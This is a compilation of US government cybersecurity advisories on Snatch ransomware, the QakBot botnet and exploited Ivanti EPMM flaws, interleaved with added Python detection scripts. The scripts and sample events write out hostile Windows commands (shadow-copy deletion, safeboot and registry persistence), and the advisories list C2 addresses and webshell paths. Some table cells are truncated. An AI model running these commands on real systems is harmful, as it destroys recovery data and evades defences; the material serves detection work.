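LEGIT_SVCHOST_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _cmd(ev):
    return ev.get("CommandLine", "").lower()


def _image(ev):
    return ev.get("Image", "").lower()


def _msg(ev):
    return ev.get("Message", "").lower()


# (rule name, predicate over one event dict)
RULES = [
    ("safeboot_set",
     lambda ev: "bcdedit" in _image(ev) and "safeboot" in _cmd(ev)),
    ("safeboot_service_registered",
     lambda ev: SAFEBOOT_REG.search(_cmd(ev)) is not None),
    ("shadow_copies_deleted",
     lambda ev: "vssadmin" in _image(ev) and "delete shadows" in _cmd(ev)),
    ("svchost_wrong_path",
     lambda ev: _image(ev).endswith("\\svchost.exe")
     and not _image(ev).startswith(LEGIT_SVCHOST_DIRS)),
    ("firewall_disabled",
     lambda ev: ev.get("Provider") == FW_PROVIDER
     and "enable windows defender firewall" in _msg(ev)
     and re.search(r"\bno\b", _msg(ev)) is not None),
    ("fileprint_allow_rule",
     lambda ev: ev.get("EventID") in (2004, 2005)
     and "file and printer sharing" in ev.get("RuleName", "").lower()
     and ev.get("Action", "").lower() == "allow"),
]


def evaluate(events):
    """Return {rule_name: [event indexes that fired]} for the given list of event dicts."""
    hits = {}
    for i, ev in enumerate(events):
        for name, pred in RULES:
            if pred(ev):
                hits.setdefault(name, []).append(i)
    return hits


# Constructed sample events shaped like the IOC tables (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bcdedit.exe",
     "CommandLine": r"bcdedit.exe /set {current} safeboot minimal"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\VSS /VE /T REG_SZ /F /D Service"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": r"vssadmin delete shadows /all /quiet"},
    {"Image": r"C:\Windows\svchost.exe", "CommandLine": r"C:\Windows\svchost.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe", "CommandLine": r"svchost.exe -k WerSvcGroup"},  # legitimate
    {"Provider": FW_PROVIDER,
     "Message": "A Windows Defender Firewall setting in the Domain profile has changed. "
                "Type: Enable Windows Defender Firewall Value: No"},
    {"Provider": FW_PROVIDER, "EventID": 2004,
     "RuleName": "File and Printer Sharing (SMB-In)", "Action": "Allow"},
]

if __name__ == "__main__":
    for rule, idx in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(f"{rule:30s} fired on events {idx}")
```

The legitimate svchost.exe event (index 4) is there as a negative control; a rule set that fires on it would page on every Windows host in the estate.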
See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory.
| Technique Title | ID | Use |
|---|---|---|
| Gather Victim Network Information | | Snatch threat actors may gather information about the victim's networks that can be used during targeting. |

| Technique Title | ID | Use |
|---|---|---|
| Acquire Infrastructure: Virtual Private Server | | Snatch threat actors may rent Virtual Private Servers (VPSs) that can be used during targeting. Snatch threat actors acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure. |

| Technique Title | ID | Use |
|---|---|---|
| Valid Accounts | | Snatch threat actors use compromised user credentials from criminal forums/marketplaces to gain access and maintain persistence on a victim’s network. |
| External Remote Services | | Snatch threat actors exploit weaknesses in RDP to perform brute forcing and gain administrator credentials for a victim’s network. Snatch threat actors use VPN services to connect to a victim’s network. |

| Technique Title | ID | Use |
|---|---|---|
| Command and Scripting Interpreter: Windows Command Shell | | Snatch threat actors may use batch files ( |
| System Services: Service Execution | | Snatch threat actors may leverage various Windows tools to enumerate systems on the victim’s network. Snatch ransomware used |

| Technique Title | ID | Use |
|---|---|---|
| Valid Accounts: Domain Accounts | | Snatch threat actors compromise domain accounts to maintain persistence on a victim’s network. |

| Technique Title | ID | Use |
|---|---|---|
| Masquerading | | Snatch threat actors have the ransomware executable match the |
| Indicator Removal: File Deletion | | Snatch threat actors delete batch files from a victim’s filesystem once execution is complete. |
| Modify Registry | | Snatch threat actors modify Windows Registry keys to aid in persistence and execution. |
| Impair Defenses: Disable or Modify Tools | | Snatch threat actors have attempted to disable a system’s antivirus program to enable persistence and ransomware execution. |
| Impair Defenses: Safe Mode Boot | | Snatch threat actors abuse Windows Safe Mode to circumvent detection by antivirus or endpoint protection and encrypt files when few services are running. |

| Technique Title | ID | Use |
|---|---|---|
| Brute Force: Password Guessing | | Snatch threat actors use brute force to obtain administrator credentials for a victim’s network. |

| Technique Title | ID | Use |
|---|---|---|
| Query Registry | | Snatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software. |
| Process Discovery | | Snatch threat actors search for information about running processes on a system. |

| Technique Title | ID | Use |
|---|---|---|
| Remote Services: Remote Desktop Protocol | | Snatch threat actors may use Valid Accounts to log into a computer using the Remote Desktop Protocol. |

| Technique Title | ID | Use |
|---|---|---|
| Data from Local System | | Snatch threat actors search systems to find files and folders of interest prior to exfiltration. |

| Technique Title | ID | Use |
|---|---|---|
| Application Layer Protocols: Web Protocols | | Snatch threat actors establish connections over port |

| Technique Title | ID | Use |
|---|---|---|
| Exfiltration | | Snatch threat actors use exfiltration techniques to steal data from a victim’s network. |

| Technique Title | ID | Use |
|---|---|---|
| Data Encrypted for Impact | | Snatch threat actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. |
| Inhibit System Recovery | | Snatch threat actors delete all volume shadow copies from a victim’s filesystem to inhibit system recovery. |
These mitigations apply to all stakeholders. The authoring agencies recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to harden software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and encrypt files), thus strengthening the security posture of their customers. For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Snatch threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at [email protected] or (888) 282-0870.
[1] DataBreaches.net
The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.
September 20, 2023: Initial version.
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to disseminate QakBot infrastructure indicators of compromise (IOCs) identified through FBI investigations as of August 2023. On August 25, FBI and international partners executed a coordinated operation to disrupt QakBot infrastructure worldwide. Disruption operations targeting QakBot infrastructure resulted in the botnet takeover, which severed the connection between victim computers and QakBot command and control (C2) servers. The FBI is working closely with industry partners to share information about the malware to maximize detection, remediation, and prevention measures for network defenders.
CISA and FBI encourage organizations to implement the recommendations in the Mitigations section to reduce the likelihood of QakBot-related activity and promote identification of QakBot-facilitated ransomware and malware infections. Note: The disruption of QakBot infrastructure does not mitigate other previously installed malware or ransomware on victim computers. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to a local FBI Field Office or CISA at cisa.gov/report.
QakBot—also known as Qbot, Quackbot, Pinkslipbot, and TA570—is responsible for thousands of malware infections globally. QakBot has been the precursor to a significant number of computer intrusions, including ransomware and the compromise of user accounts within the Financial Sector. In existence since at least 2008, QakBot feeds into the global cybercriminal supply chain and has deep-rooted connections to the criminal ecosystem. QakBot was originally used as a banking trojan to steal banking credentials for account compromise; in most cases, it was delivered via phishing campaigns containing malicious attachments or links to download the malware, which would reside in memory once on the victim network.
Since its inception as a banking trojan, QakBot has evolved into a multi-purpose botnet and malware variant that provides threat actors with a wide range of capabilities, including performing reconnaissance, engaging in lateral movement, gathering and exfiltrating data, and delivering other malicious payloads, including ransomware, on affected devices. QakBot has maintained persistence in the digital environment because of its modular nature. Access to QakBot-affected (victim) devices via compromised credentials is often sold to further the goals of the threat actor who delivered QakBot.
QakBot and affiliated variants have targeted the United States and other global infrastructures, including the Financial Services, Emergency Services, and Commercial Facilities Sectors, and the Election Infrastructure Subsector. FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood of QakBot-related infections and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other previously installed malware or ransomware on victim computers. If a potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA and FBI.
QakBot’s modular structure allows for various malicious features, including process and web injection, victim network enumeration and credential stealing, and the delivery of follow-on payloads such as Cobalt Strike[1], Brute Ratel, and other malware. QakBot infections are particularly known to precede the deployment of human-operated ransomware, including Conti[2], ProLock[3], Egregor[4], REvil[5], MegaCortex[6], Black Basta[7], Royal[8], and PwndLocker.
Historically, QakBot’s C2 infrastructure relied heavily on using hosting providers for its own infrastructure and malicious activity. These providers lease servers to malicious threat actors, ignore abuse complaints, and do not cooperate with law enforcement. At any given time, thousands of victim computers running Microsoft Windows were infected with QakBot—the botnet was controlled through three tiers of C2 servers.
The first tier of C2 servers consists of a subset of the thousands of bots, selected by QakBot administrators and promoted to Tier 1 “supernodes” by downloading an additional software module. These supernodes communicate with the victim computers, relaying commands and communications between the upstream C2 servers and the infected computers. As of mid-June 2023, 853 supernodes active that same month had been identified in 63 countries. Supernodes have been observed changing frequently, which helps QakBot evade detection by network defenders. Each bot has been observed communicating with a set of Tier 1 supernodes, which relay communications to the Tier 2 C2 servers; the Tier 2 servers serve as proxies to conceal the main C2 server. The Tier 3 server controls all of the bots.
FBI has observed the following threat actor tactics, techniques, and procedures (TTPs) in association with QakBot infections:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:\Users\AppData\Roaming\Microsoft
HKEY_CURRENT_USER\Software\Microsoft
In addition, the below IP addresses were assessed to have obtained access to victim computers. Organizations are encouraged to review any connections with these IP addresses, which could potentially indicate a QakBot and/or follow-on malware infection.
Disclaimer: The below IP addresses are assessed to be inactive as of August 29, 2023. Several of these observed IP addresses were first observed as early as 2020, although most date from 2022 or 2023, and have been historically linked to QakBot. FBI and CISA recommend these IP addresses be investigated or vetted by organizations prior to taking action, such as blocking.
| IP Address | First Seen |
|---|---|
| 85.14.243[.]111 | April 2020 |
| 51.38.62[.]181 | April 2021 |
| 51.38.62[.]182 | December 2021 |
| 185.4.67[.]6 | April 2022 |
| 62.141.42[.]36 | April 2022 |
| 87.117.247[.]41 | May 2022 |
| 89.163.212[.]111 | May 2022 |
| 193.29.187[.]57 | May 2022 |
| 193.201.9[.]93 | June 2022 |
| 94.198.50[.]147 | August 2022 |
| 94.198.50[.]210 | August 2022 |
| 188.127.243[.]130 | September 2022 |
| 188.127.243[.]133 | September 2022 |
| 94.198.51[.]202 | October 2022 |
| 188.127.242[.]119 | November 2022 |
| 188.127.242[.]178 | November 2022 |
| 87.117.247[.]41 | December 2022 |
| 190.2.143[.]38 | December 2022 |
| 51.161.202[.]232 | January 2023 |
| 51.195.49[.]228 | January 2023 |
| 188.127.243[.]148 | January 2023 |
| 23.236.181[.]102 | Unknown |
| 45.84.224[.]23 | Unknown |
| 46.151.30[.]109 | Unknown |
| 94.103.85[.]86 | Unknown |
| 94.198.53[.]17 | Unknown |
| 95.211.95[.]14 | Unknown |
| 95.211.172[.]6 | Unknown |
| 95.211.172[.]7 | Unknown |
| 95.211.172[.]86 | Unknown |
| 95.211.172[.]108 | Unknown |
| 95.211.172[.]109 | Unknown |
| 95.211.198[.]177 | Unknown |
| 95.211.250[.]97 | Unknown |
| 95.211.250[.]98 | Unknown |
| 95.211.250[.]117 | Unknown |
| 185.81.114[.]188 | Unknown |
| 188.127.243[.]145 | Unknown |
| 188.127.243[.]147 | Unknown |
| 188.127.243[.]193 | Unknown |
| 188.241.58[.]140 | Unknown |
| 193.29.187[.]41 | Unknown |
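The addresses above are printed defanged (“[.]”), so before they can be compared with logs they have to be normalised back to dotted quads and validated, and because the advisory dates each one, a match should carry its first-seen date so the analyst can judge how stale the indicator is. The Python below is an added example and not advisory code: it refangs a four-address subset of the table (copied verbatim as a constructed sample), validates each with the standard library, and looks the set up in constructed firewall and proxy log lines. As the advisory cautions, a hit on these inactive addresses is a lead to investigate, not grounds to block on its own.

```python
"""Refang the advisory's defanged IPs and match them against log lines (added example)."""
import ipaddress
import re

# Constructed sample: four rows copied from the table above in their defanged form.
IOC_TEXT = """\
85.14.243[.]111 | April 2020
51.38.62[.]181 | April 2021
188.127.243[.]130 | September 2022
23.236.181[.]102 | Unknown
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def refang(token: str) -> str:
    """Undo the common defanging conventions ([.], (.), [dot]) so the string parses as an address."""
    return token.replace("[.]", ".").replace("(.)", ".").replace("[dot]", ".")


def load_iocs(text: str) -> dict:
    """Parse 'ip | first seen' lines into {dotted_quad: first_seen}.

    ipaddress.ip_address() raises ValueError on anything that is not an address,
    so a garbled or truncated row fails loudly instead of silently never matching.
    """
    iocs = {}
    for line in text.splitlines():
        if "|" not in line:
            continue
        ip_raw, seen = (part.strip() for part in line.split("|", 1))
        ip = str(ipaddress.ip_address(refang(ip_raw)))
        iocs[ip] = seen
    return iocs


def scan_logs(lines, iocs: dict) -> list:
    """Return (line_number, ip, first_seen) for every log line mentioning an IOC address."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ip in IPV4.findall(line):
            if ip in iocs:
                hits.append((n, ip, iocs[ip]))
    return hits


# Constructed firewall/proxy lines (not real telemetry); 10.20.30.0/24 is the internal side.
SAMPLE_LOG = [
    "2023-08-29T10:01:02Z fw ALLOW TCP 10.20.30.40:51512 -> 85.14.243.111:443",
    "2023-08-29T10:01:09Z proxy GET http://203.0.113.7/ 10.20.30.41 200",
    "2023-08-29T10:02:44Z fw ALLOW TCP 10.20.30.42:49211 -> 23.236.181.102:995",
]

if __name__ == "__main__":
    table = load_iocs(IOC_TEXT)
    for line_no, ip, first_seen in scan_logs(SAMPLE_LOG, table):
        print(f"line {line_no}: {ip} (first seen {first_seen}) - vet before blocking")
```

Matching on the refanged string rather than a substring search avoids the classic false positive where 95.211.172.6 also “matches” 95.211.172.60; the `\b` anchors in the regex and the exact dictionary lookup keep the comparison on whole addresses.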
Organizations are also encouraged to review the Qbot/QakBot Malware presentation from the U.S. Department of Health & Human Services Cybersecurity Program for additional information.
For detailed associated software descriptions, tactics used, and groups that have been observed using this software, see MITRE ATT&CK’s page on QakBot.[9]
Note: For situational awareness, the following SHA-256 hash is associated with FBI’s QakBot uninstaller: 7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117
CISA and FBI recommend network defenders apply the following mitigations to reduce the likelihood of QakBot-related activity and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other already-installed malware or ransomware on victim computers. Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques.
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with QakBot-affiliated actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report.
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
August 30, 2023: Initial version.
The Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2023-35078 and CVE-2023-35081. Advanced persistent threat (APT) actors exploited CVE-2023-35078 as a zero day from at least April 2023 through July 2023 to gather information from several Norwegian organizations, as well as to gain access to and compromise a Norwegian government agency’s network.
Ivanti released a patch for CVE-2023-35078 on July 23, 2023. Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability CVE-2023-35081 and released a patch for the second vulnerability on July 28, 2023. NCSC-NO observed possible vulnerability chaining of CVE-2023-35081 and CVE-2023-35078.
CVE-2023-35078 is a critical vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM) (formerly known as MobileIron Core). The vulnerability allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. CVE-2023-35081 enables actors with EPMM administrator privileges to write arbitrary files with the operating system privileges of the EPMM web application server. Threat actors can chain these vulnerabilities to gain initial, privileged access to EPMM systems and execute uploaded files, such as webshells.
Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices, and APT actors have exploited a previous MobileIron vulnerability. Consequently, CISA and NCSC-NO are concerned about the potential for widespread exploitation in government and private sector networks.
This CSA provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) obtained by NCSC-NO investigations. The CSA also includes a nuclei template to identify unpatched devices and detection guidance organizations can use to hunt for compromise. CISA and NCSC-NO encourage organizations to hunt for malicious activity using the detection guidance in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA. If no compromise is detected, organizations should still immediately apply patches released by Ivanti.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
In July 2023, NCSC-NO became aware of APT actors exploiting a zero-day vulnerability in Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core, to target a Norwegian government network. Ivanti confirmed that the threat actors exploited CVE-2023-35078 and released a patch on July 23, 2023.[1] Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability, CVE-2023-35081, and released a patch for the second vulnerability on July 28, 2023.[2]
CVE-2023-35078 is a critical authentication bypass [CWE-288] vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core. The vulnerability allows unauthenticated access to specific application programming interface (API) paths. Threat actors with access to these API paths can access PII such as names, phone numbers, and other mobile device details of users on the vulnerable system; make configuration changes to vulnerable systems; push new packages to mobile endpoints; and access Global Positioning System (GPS) data if enabled.
According to Ivanti, CVE-2023-35078 can be chained with a second vulnerability, CVE-2023-35081.[2] CVE-2023-35081 is a directory traversal vulnerability [CWE-22] in EPMM. It allows threat actors with EPMM administrator privileges to write arbitrary files, such as webshells, with the operating system privileges of the EPMM web application server. The actors can then execute the uploaded file.[2]
CISA added CVE-2023-35078 to its Known Exploited Vulnerabilities Catalog on July 25, 2023, and CVE-2023-35081 on July 31, 2023.
CISA and NCSC-NO are concerned about the potential for widespread exploitation of both vulnerabilities in government and private sector networks because MDM systems provide elevated access to thousands of mobile devices. Threat actors, including APT actors, have previously exploited a MobileIron vulnerability [3],[4].
The APT actors have exploited CVE-2023-35078 since at least April 2023. The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy [T1090] to target infrastructure. NCSC-NO observed the actors exploiting CVE-2023-35078 to obtain initial access to EPMM devices [T1190] and to access the API path /mifs/aad/api/v2/authorized/users to list users and administrators [T1087.002] on the EPMM device.
The APT actors deleted some of their entries in Apache httpd logs [T1070] using mi.war, a malicious Tomcat application that deletes log entries based on the string in keywords.txt. The actors deleted log entries containing the string Firefox/107.0.
The APT actors used Linux and Windows user agents containing Firefox/107.0 to communicate with EPMM. Other user agents were used; however, they did not appear in the device logs. It is unconfirmed how the threat actors ran shell commands on the EPMM device; however, NCSC-NO suspects the actors exploited CVE-2023-35081 to upload webshells to the EPMM device and run commands [T1059].
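The two observables described above (requests to the /mifs/aad/api/v2/ API paths and user agents containing Firefox/107.0) turned into a log-triage check. This is an added example, not code from the advisory or from Ivanti; it assumes the EPMM httpd access log is in Apache combined format, and the sample log lines and their paths and addresses are constructed.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Apache "combined" access-log format (assumption for the EPMM httpd log).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators taken from the advisory text.
SUSPICIOUS_PATH_PREFIX = "/mifs/aad/api/v2/"
SUSPICIOUS_UA_MARKER = "Firefox/107.0"


@dataclass
class Hit:
    ip: str
    ts: str
    path: str
    status: int
    ua: str
    reasons: tuple  # which indicator(s) matched


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def scan_access_log(lines):
    """Flag requests to the MIFS API paths and requests carrying the Firefox/107.0 UA.

    A clean result is not a clean bill of health: mi.war deleted the actors' own
    Firefox/107.0 entries, so absence of hits must be read together with the AD
    EventCode checks the advisory lists.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip unparseable lines (rotated-log headers, truncation)
        reasons = []
        if rec["path"].startswith(SUSPICIOUS_PATH_PREFIX):
            reasons.append("mifs-api-path")
        if SUSPICIOUS_UA_MARKER in rec["ua"]:
            reasons.append("firefox-107-ua")
        if reasons:
            hits.append(Hit(rec["ip"], rec["ts"], rec["path"],
                            int(rec["status"]), rec["ua"], tuple(reasons)))
    return hits


def hits_per_source(hits):
    """Count hits per client IP; clusters point at the proxying SOHO routers."""
    return Counter(h.ip for h in hits)


# Constructed sample log (documentation-range IPs, made-up paths and timestamps).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2023:13:01:22 +0000] "GET /mifs/aad/api/v2/authorized/users HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0"
198.51.100.23 - - [10/Apr/2023:13:02:05 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
203.0.113.7 - - [10/Apr/2023:13:02:40 +0000] "GET /mifs/status.html HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0"
192.0.2.15 - - [10/Apr/2023:13:03:11 +0000] "POST /mifs/aad/api/v2/ping HTTP/1.1" 401 0 "-" "curl/7.88.1"
this line is not in combined log format
"""

if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{h.ts} {h.ip} {h.status} {h.path} <- {', '.join(h.reasons)}")
    print(hits_per_source(scan_access_log(SAMPLE_LOG.splitlines())))
```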
The APT actors tunneled traffic [T1572] from the internet through Ivanti Sentry, an application gateway appliance that supports EPMM, to at least one Exchange server that was not accessible from the internet [T1090.001]. It is unknown how they tunneled traffic. NCSC-NO observed that the network traffic used the TLS certificate of the internal Exchange server. The APT actors likely installed webshells [T1505.003] on the Exchange server in the following paths [T1036.005]:
/owa/auth/logon.aspx
/owa/auth/logoff.aspx
/owa/auth/OutlookCN.aspx
NCSC-NO also observed mi.war on Ivanti Sentry but does not know how the actors placed it there.
See Table 1—Table 7 for all referenced threat actor tactics and techniques in this advisory.
Technique Title | ID | Use |
---|---|---|
Exploit Public-Facing Application | T1190 | The APT actors exploited CVE-2023-35078 in public-facing Ivanti EPMM appliances since at least April 2023. |

Technique Title | ID | Use |
---|---|---|
Command and Scripting Interpreter | T1059 | The APT actors may have exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands. |

Technique Title | ID | Use |
---|---|---|
Account Discovery: Domain Account | T1087.002 | The APT actors exploited CVE-2023-35078 to gather EPMM device users and administrators. |
Remote System Discovery | T1018 | The APT actors retrieved LDAP endpoints. |

Technique Title | ID | Use |
---|---|---|
Masquerading: Match Legitimate Name or Location | T1036.005 | The APT actors likely installed webshells at legitimate Exchange server paths. |
Server Software Component: Web Shell | T1505.003 | The APT actors implanted webshells on the compromised infrastructure. |

Technique Title | ID | Use |
---|---|---|
Indicator Removal | T1070 | APT actors deleted httpd access logs after the malicious activities took place, selecting entries by the string Firefox/107.0. |

Technique Title | ID | Use |
---|---|---|
Data from Local System | T1005 | APT actors regularly checked EPMM Core audit logs. |

Technique Title | ID | Use |
---|---|---|
Protocol Tunneling | T1572 | The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet. |
Proxy | T1090 | The actors leveraged compromised SOHO routers to proxy to and compromise infrastructure. The actors tunneled traffic from the internet to at least one Exchange server. |
Proxy: Internal Proxy | T1090.001 | The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet. |
CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35078:
CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35081:
Run the following NCSC-NO-created checks to check for signs of compromise:
Check syslogs from EPMM devices for any occurrences of /mifs/aad/api/v2/.
Check for EventCode=1644 in the AD since at least April 2023. The LDAP queries performed by EPMM when the threat actor used the MIFS API generated tens of millions of this event code. Also look for EventCodes 4662, 5136, and 1153.
Check for network traffic that presents the TLS certificate of an internal Exchange server (CN=EXCHANGE01 or similar) where it is not expected, such as connections tunneled through Ivanti Sentry.
If compromise is detected, organizations should:
CISA and NCSC-NO recommend organizations:
# install rpm url https://support.mobileiron.com/ivanti-updates/ivanti-security-update-1.0.0-1.noarch.rp
In addition to applying mitigations, CISA and NCSC-NO recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] Ivanti: CVE-2023-35078 – Remote Unauthenticated API Access Vulnerability
[2] Ivanti: CVE-2023-35081 – Remote Arbitrary File Write
[3] CISA: Potential for China Cyber Response to Heightened U.S.-China Tensions
[4] CISA: Top Routinely Exploited Vulnerabilities
Ivanti contributed to this joint advisory.
NCSC-NO wishes to acknowledge Mnemonic’s contributions.
August 1, 2023: Initial version.
August 2, 2023: Added stix file, updated Acknowledgements section, and added Resources section.
NCSC-NO observed the following webshell hash: c0b42bbd06d6e25dfe8faebd735944714b421388
NCSC-NO observed the following hash of mi.war: 1cd358d28b626b7a23b9fd4944e29077c265db46
NCSC-NO observed the following JA3 hashes used against MobileIron Core:
2d5bd942ebf308df61e1572861d146f6 473cd7cb9faa642487833865d516e578 579ccef312d18482fc42e2b822ca2430 849d3331f3e07a0797a02f12a6a82aa9 8d9f7747675e24454cd9b7ed35c58707 ad55557b7cbd735c2627f7ebb3b3d493 cd08e31494f9531f560d64c695473da9 e1d8b04eeb8ef3954ec4f49267a783ef e60dc8370ecf78cf115162fbc257baf5 e669667efb41c36f714c309243f41ca7 e84a32d43db750b206cb6beed08281d0 eb5fdc72f0a76657dc6ea233190c4e1c
NCSC-NO observed the following JA3 hashes used against Exchange when tunneling via EPMM Sentry:
NCSC-NO observed the following user agents communicating with Exchange (OWA and EWS):
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
NCSC-NO observed the following user agents communicating with the Exchange webshell:
